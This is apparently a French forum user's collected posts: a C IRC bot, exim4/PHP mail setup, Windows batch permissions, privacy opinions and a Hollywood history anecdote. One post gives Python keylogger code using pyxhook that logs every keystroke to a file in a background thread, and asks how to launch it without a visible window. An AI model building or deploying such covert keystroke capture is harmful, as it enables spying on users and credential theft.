Salut,

Ai je dis que c'était un sujet banni ?

Ok, c'était pour être sur, je prenais position au cas ou.

J'ai parlé d'autorun via clé USB, pas d'autre chose.

C'est ce que je me suis dit après coup. Je trouvais ça bizarre aussi. 

Bon ba si on a fait le tour, il nous reste plus qu'à souhaiter bonne chance à Skyroryk alors.
See ya!

Bonsoir bonsoir,
Effectivement, essayons d'appeler les choses par leur nom, après ce qu'on en fait c'est autre chose.

Dans un petit script maison on pourrait vite fait faire un truc du genre (pour reprendre mon code d'avant) :

Code:

	def task(self):                                                   
		def kbevent(event):
			global running
			if chr(event.Ascii) == 'E': # Création du raccourci.
                                os.listdir("/home/") # Ou n'importe quoi finalement, on fait ce qu'on veut.

Aucune frappe n'est enregistrée mais on peut quand même s'en servir. Bon ici mon histoire n'est pas trop fonctionnel, on préfèrerait plutot un 'ctrl'+'e' par exemple, mais ca illustre quand même un peu.
Par contre effectivement, si tu veux que ton programme soit un tantinet transportable, il vaudrait mieux s'orienter sur un langage compilé.

Par rapport au caractère controversé qu'on pourrait trouver dans cette discussion, pour moi qui suit autodidacte, je trouve que ça reste une  façon assez ludique d'aborder la programmation, d'apprendre le réseau, les protocoles... Plutôt que de suivre bètement un cours sur le net, autant se poser des problématiques sympas et se plonger dans les docs! (Mais c'est cool les cours sur internet hein, je ne veux pas laisser penser le contraire.)
Cela dit, je ne veux légitimer en aucun cas tout comportement plus que discutable. Mais on fait des contests de Hacking ou quoi?

Du coup ça peut être pas mal de finir tout ça en python, se rendre compte de ses avantages comme de ses limites, et puis repartir pour un tour sur un autre langage. Bon par contre ça peut prendre un certain temps, effectivement...

Sinon,

En l’occurrence, à ma connaissance, il n'existe depuis plusieurs années plus aucun moyen d'exécuter un programme lors du branchement d'une clé USB.

La dessus, j'en mettrais pas ma main à couper. Je pense bien a quelque chose (la faille ultime!), et qui ne s'arrète pas qu'au clés malheureusement (/ou tout l'inverse je sais plus^^), mais vraiment trop compliqué à réaliser. ;p (Là, je parle pour moi.)

Salut,
j'arrive un peu après la guerre, mais pyhook est vraiment pas mal et bien documenté. (J'ai utilisé la version Linux Pyxhook, mais je pense que ca être très similaire sur windows.)
Tu peux aussi appeler ta fonction de capture au travers d'un thread de façon à pouvoir la garder plus facilement ouverte. (Ce sont des pistes que j'ai exploré.)

Petit exemple avec pyxhook:

Code:

import pyxhook
import threading
from fonctionEcrire import *

class Keylogger(threading.Thread):    
	def __init__(self):
		threading.Thread.__init__(self)

	def task(self):                                                   # Cette fonction est appellee a chaque fois qu'une touche du clavier est pressee.
		def kbevent(event):
			global running
			Ecrire("donnees", chr(event.Ascii))  # Trouver un emplacement absolu ça peut aider!

		# Creation hookmanager
		hookman = pyxhook.HookManager()
		# Hook le keyboard
		hookman.KeyDown = kbevent
		hookman.HookKeyboard()
		# Start
		hookman.start()

		while running:
			time.sleep(0.1)

		# Close
		hookman.cancel()
		pass

Sur le même principe tu peux faire le hookman.HookMouse() (clic gauche, clic droit, etc...)
Pour Ecrire le fichier j'utilise write() aussi, je ne la détaille pas.

Ensuite tu peux démarrer la capture au travers d'un thread avec:

Code:

#(... Début du programme)

running = True
TH = Keylogger()
Ecrire("donnees", "\n\nDebut de la session d'enregistrement le : "+heure+".\n\n")
TH.start()

#(... Suite du programme)

#Et par exemple pour quitter:
		if messagerecu == exitcode :
			running = False # Pour pouvoir quitter le keylogger.

C'est la seule façon que j'ai trouvé pour capturer quoi qu'il arrive, et même avec la fenêtre du programme en arrière plan. Par contre pour l'ouverture "discrète", je ne sais pas comment tu pourrais empécher l'ouverture d'une fenêtre. Il n'y avait pas une astuce à ce sujet, en jouant avec l'extension .py(?) ?

Salut,

user: xcopy ....
Erreur : P introuvable

Il s'agit peut être d'une histoire de chemin relatif/absolu...
Sinon naïvement, c'est pas des '\' normalement sous windows? (C:\)

L'utilisateur qui se connecte n'est pas admin il est seulement Utilisateurs. Le fichier GroupPolicy est caché pour les Utilisateurs. Mais, le cmd s'ouvre. Donc je pense qu'ils ont accès au script. Ils ne peuvent pas modifier, supprimer un fichier du System32 (n'importe lequel). Sur mon ordinateur j'ai une seule session admin et j'ouvre ce fichier avec les autres sessions (non admin).

Ça c'est une histoire de permissions, tu dois pouvoir vérifier (et éditer) directement avec : Clic droit/ Propriétés/ Partage (ou quelque chose dans le genre).
Sinon le plus simple, si cmd s'ouvre, c'est de regarder directement ce à quoi tu as accés par là.

A oui aussi,

je ne sais pas si le batch est un language compilé ou pas

C'est pour faire du script, c'est un langage interprété, et donc non compilé.

++

Bonjour à tous.
Hollywood est né grâce à Thomas Edison! (enfin, en presque)

Alors je m'explique,
pour la petite histoire, à la fin du 19ème siècle début du 20ème, alors que les procédés du cinéma étaient assez nouveaux, (1891 Thomas Edison invente le kinetoscope. Le cinematographe des frères Lumière n'apparu lui qu'en 1895.)
Edison et sa compagnie ont commencé à accaparer le monopôle du cinéma et déposé des brevets sur un peu tout ce qui était possible (sur la péliculle, le matériel de tournage, etc...), ne laissant ainsi aucune place à la concurence.
Il fallait donc utiliser leur matériel, leur péliculle (ou celui de leurs partenaires) et tous les moyens étaient bons pour que cela soit respecté.

Plus concrètement, il pouvait s'agir de procès visant à interdire tel ou tel distributeur, ou alors plus simplement, de passages à tabac ou bien de sabotages, mais aussi, même plus radicalement d'homicides...

Le fait est que les cinéastes indépendants ont commencé à migrer vers la côte Ouest pour fuire cette "mafia du cinéma" (le cinéma à l'époque était principalement basé à Chicago). Et c'est ainsi qu'ils ont finis par s'installer à Hollywood, la Californie était vraiment pas si mal pour la diversité de paysages qu'elle offrait (et offre sûrement toujours (enfin je sais pas, j'y suis jamais allé)).


Pour la question bonus : le neuropiratage, insufflons lui que c'est nous ce qui est bien pour elle! D'ailleurs, il y a au moins huits messages subliminaux ici!  

Salut N4idr4,
malheureusement, si whoami te répond que tu es level01 c'est que tu dois avoir loupé quelque chose...
L'explication étant ni plus ni moins ce que tu dois trouver ici pour valider l'épreuve. 
Allez courage!

Salut,
comme ca je dirais que ta methode est bonne mais que tu ne dois pas regarder au bon endroit...

Voila, en me promenant sur le net, je suis tombe dans un monde merveilleux, celui de Rafale. (l'introduction pas du tout racoleuse...)
Il s'agit d'un magazine electronique qui se veut libre et independant, existant depuis 2006. On y trouve un peu de tout (enfin surtout hacking en tous genres, mais pas seulement).
Il y a beaucoup de choses et je n'ai pas encore tout lu, mais je voulais partager ca avec vous. J'ai trouve le lien sur le IRC de hackbbs.
http://rafale.org ou encore http://rafale.org/sommaires.php pour se donner une idee plus precise.

Je vous laisse decouvrir, bonne lecture!

Salut a tous, le sujet date un peu je sais, mais je viens de tomber dessus et je ne peux m'empecher d'intervenir.

A mon humble avis il est primordial aujourd'hui de proteger au mieux son identite avec toutes ces collectes de donnees presentes sur internet en veux tu en voila a toutes les sauces.
Pouvoir rester anonyme aujourd'hui est devenu vraiment complique (ou peut etre qu'avant je me rendais moins compte), la moindre recherche, le moindre site visite, sera note quelque part et analyse.

On peut meme voir pire encore en disant que la moindre activite informatique sera enregistre. (windows, android, OSX... les exemples ne manquent pas concernant de nombreux scandales lies a des traqueurs en tout genre.(l'utilisateur mal informe ou peu soucieu sera le premier facteur de contamination mais je suis persouade que bien des choses sont deja en place pour nous espionner))
Se proteger de tout ceci me semble vraiment important.
Il semble effectivement que linux soit le plus epure de tout ca bien que la tendance s'inverse. (merci android! )

C'est pourquoi, on va peut etre me traiter de troll, mais a je me permets de dire, (et ca n'engage que moi) que Google is NOT your friend, this is your ennemy. (et il n'est pas le seul...)
Il me semble vraiment important de limiter au maximum son utilisation, voir de la proscrire completement. De tres bon moteurs de recherches existent en parallele.

Je voudrais ajouter egalement qu'il faudrait utiliser le maximum de logiciels open-sources. La pluparts des besoins ont des solutions open-sources.

J'espere ne pas avoir ete trop lourd ou moralisateur, desole si ca a ete le cas, je me suis contenu au mieux (parceque j'en ai des choses a dire!).

See ya!

Tu peux utiliser la méthode c_str() pour obtenir un const char *.

Oui, j'ai fini par tomber dessus a force de chercher. Mais c'est vrai que pour l'instant je galere un peu entre mes char, char*, const char, const char*, etc etc... A chaque fois que je veux reutiliser une donnee, je me retrouve face a ce probleme! Mais ca vient petit a petit.

Pour l'utilisation de boost, je l'ai vu passer dans mes recherches, mais je n'ai pas creuse plus que ca. Son utilisation a l'air vraiment large... Dans quel sens l'utiliser pour le reseau? (mis a part ca, il a l'air utile pour bien des choses.)


En tous cas merci pour ces reponses, etant encore bien debutant, c'est deja un bon coup de main!

Ah cool merci!

J'en profite d'ailleurs pour soulever un autre point, au debut j'ai essaye de construire mon write() comme ca :

Code:

    std::string id("USER bot bot bot bot\r\n");
    n = write(ircsock, id, strlen(id));

Ce qui posait un probleme de type.

Apres quelques recherches, j'ai fini par faire comme ca :

Code:

    sprintf (buffer, "USER %s\r\n", user);
    n = send (ircsock, buffer, strlen (buffer), 0);
    //n = write(ircsock, buffer, strlen(buffer)); //Identification du bot
    if (n < 0)
         error("ERROR writing to socket USER");

Du coup j'ai remplace par write() et read() par send() et recv(), quelle est la reelle difference entre les deux?


J'ai aussi ajoute le pong :

Code:

    while(1)
    {
        bzero(buffer,2048);
        n = recv(ircsock, buffer, BUFSIZ-1, 0);
        if (n < 0)
            error("ERROR reading from socket");
        //printf("%s\n",buffer);
        if (strstr(buffer, "PING :"))
            {
                rcvmsg = strstr(buffer, "PING :") + strlen("PING :");
                snprintf(msg, 256, "PONG :%s\n", rcvmsg);
                send(ircsock, msg, strlen(msg), 0);
            }
    }

EDIT DE LA FIN: ayant ecris ce message en meme temps que je programmais, j'ai fini par trouver mon probleme :
L'utilisation du port SSL. En changeant de port la communication a fini par passer!
Mais ce sera un probleme pour plus tard! (je pense que je trouverais bien, ca doit juste etre un message qu'envoie le client pour confirmer qu'il accepte le certif)

Bon, l'essentiel c'est que ca marche enfin et que j'ai fini par comprendre...
(Comme souvent, probleme assez stupide en fait, desole si j'encombre le forum de post inutiles...)
Mais pour ma defense, c'est en forgeant que l'on devient forgeron.  


En tous cas merci!

Comment repondre au PING si je n'arrive pas a le recevoir?
Pour moi le PING se gere apres reception des donnees, et visiblement c'est ici que ca bloque.

Je n'ai pas eu le temps de creuser plus que ca, mais merci de ta reponse.

Bonjour,
Dans le cadre de mon developpement personnel en programmation j'ai fini par me relancer a l'attaque du C.

Pour ce programme, je souhaite juste pour l'instant initialiser une connexion a un serveur irc.
(Je me suis base sur un prog que j'avais fait en python pour lancer la connexion et rejoindre un canal, ainsi qu'un exemple tout bete de communication client/serveur en C trouve sur le net. Du coup je concois que ca peut etre un joli micmac,  pour moi ca a ete le cas en tous cas, mais petit a petit je m'en sors.  )

Code:

#include <iostream>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

// Gestion des erreurs
void error(const char *msg)
{
    perror(msg);
    exit(0);
}

int main()
{
    int ircsock, port, n;
    struct sockaddr_in serv_addr;
    struct hostent *server;

    char buffer[2048];

    port = atoi("6697");
//    port = atoi("22222");


    printf("Tentative de connexion...\n");
    ircsock = socket(AF_INET, SOCK_STREAM, 0);
    if (ircsock < 0)
        error("ERROR opening socket");
    server = gethostbyname("chat.freenode.net");
//    server = gethostbyname("localhost");
    if (server == NULL)
        {
        fprintf(stderr,"ERROR, no such host\n");
        exit(0);
        }

    bzero((char *) &serv_addr, sizeof(serv_addr));
    serv_addr.sin_family = AF_INET;
    bcopy((char *)server->h_addr,
         (char *)&serv_addr.sin_addr.s_addr,
         server->h_length);
    serv_addr.sin_port = htons(port);
    if (connect(ircsock,(struct sockaddr *) &serv_addr,sizeof(serv_addr)) < 0)
        error("ERROR connecting");
    printf("Connecte!\r\n");


// Une fois connecte, le bot doit s'identifier sur le serveur irc puis rejoint un canal.
    n = write(ircsock,"USER bot bot bot bot\r\n",24); //Identification du bot
    if (n < 0)
         error("ERROR writing to socket ID");
    n = write(ircsock,"NICK MonBot\r\n",15); //Assigne le nick du bot
    if (n < 0)
         error("ERROR writing to socket NICK");
    n = write(ircsock,"JOIN #canalTest\r\n",19); //Rejoind le canal
    if (n < 0)
         error("ERROR writing to socket JOIN");

// Et on attend un message du serveur.
    while(1)
    {
        bzero(buffer,2048);
        n = read(ircsock,buffer,2048);
        if (n < 0)
            error("ERROR reading from socket");
        printf("%s\n",buffer);
    }
    close(ircsock);
    return 0;
}

En gros,
- quand je compile, pas d'erreurs
- Je vois bien que le message transit en local via write() je suppose que c'est toujours le cas sur freenode car pas d'erreur ici lors de l'exe.
- le proggramme se ferme dans le while(1) avec un "ERROR reading from socket: Connection reset by peer.

Pour moi, le fait de faire une boucle infinie me permetait de rester dans ma connexion. A la rigueur un 'time out' car pas de ping pong, mais ca devrait passer?
Que me manque-t-il?

Si quelqu'un pouvait m'eclaircir de sa lumiere.
Merci!

Ca y est!, j'en suis venu a bout!!!

Donc c'etait bel et bien un probleme de configuration.
Je suis reparti sur exim4 au final mais la procedure doit etre la meme avec sendmail :

Pour la configuration :

Code:

sudo dpkg-reconfigure exim4-config

De la, on a une interface qui s'affiche a l'ecran, il suffit de repondre au questions.
Ou alors modifier directement le fichier /etc/exim4/update-exim4.conf.conf.

Apres on recharge la nouvelle config :

Code:

sudo update-exim4.conf

Et on redemarre le service :

Code:

sudo service exim4 restart

Un peu plus de detailles dans un lien ci-joint.
J'ai un peu honte, j'aurais du commencer par la... https://doc.ubuntu-fr.org/exim4-satellite  
(En meme temps, personne ne parlait de ca dans les docs que j'avais suivi... (ni meme pour sendmail))

Du coup pour la configuration de sendmail on peut faire ca :

Code:

sudo sendmailconfig

J'ai egalement modifie le fichier /etc/hosts pour y mettre en premiere ligne:

Code:

127.0.0.1 localhost localhost.localdomain domain_name          # En remplacant "localhost.localdomain" et "domain_name" par les infos qui vont biens.

Puis en commentant les doublons.

On redemarre exim4, puis apache2, et la miracle ca fonctionne!

Bon il reste bien les petites configurations a faire, mais ca je m'en charge! Oh top!
Un grand merci a vous deux!  

PS : Pour l'histoire des spams, a ouais, j'avais pas compris ^^ bon ba tant mieux alors!
Et puis merci au passage, j'ai pu voir que wireshark etait pas bien mechant, et tres interessant!

Bon, je viens un peu faire le point, vu que mon precedent  message etait quand meme un peu brouillon.

1 - Effectivement, la fonction mail() de PHP utilise bien par defaut l'outil sendmail, mais sendmail n'est pas le seul possible.
Par defaut Debian lui, a d'installe exim4 (qui doit faire plus ou moins la meme chose que sendmail).

2 - On peut specifier ce genre de choses a PHP grace au fichier php.ini,
a la rubrique : [mail function],
a la ligne : sendmail_path = "/usr/sbin/exim4 -t -i" ou bien : sendmail_path = "/usr/sbin/sendmail -t -i".

J'ai donc essaye avec les deux programmes mais visiblement aucun mail n'est envoye.
J'ai egalement suivi la doc officielle de PHP afin d'utiliser la fonction mail() de la maniere la plus simple possible.
En cherchant a propos de Apache2 et l'envoi de mail, je retombe toujours sur l'utilisation de PHP. Donc mon probleme viendrait surement de sa (mauvaise) configuration...

Par contre j'ai trouve ca sur le net :

Si vous envisagez d'envoyer du courrier à d'autres domaines Internet, vous devez vous assurer que l'adresse IP de la machine qui envoie le courrier comporte également une entrée DNS inversée (enregistrement PTR). La plupart des fournisseurs d'accès Internet importants rejetteront votre courrier si votre adresse IP n'a pas d'enregistrement PTR ou s'il pointe vers un hôte générique (par exemple, 1.2.3.3.domain.isp.com). Il devrait inverser quelque chose comme mail.yourdomain.com

Cependant, comme je l'expliquais au debut, ce service smtp de chez orange, je l'ai deja teste et approuve (encore a l'instant via un script python et le mail est bien recu) et a aucun moment je me suis pose de questions a propos de ce PTR...

Par contre j'ai reussi a intercepter le mail envoye via python sur wireshark, ce qui me permet de bien visualiser sa structure. Peut-etre est-ce juste une erreur de conception/structure/compatibilite?
A suivre...

Des gens ont-ils deja envoye des mail via PHP (de maniere authentifie ou non) histoire de comparer?
Merci!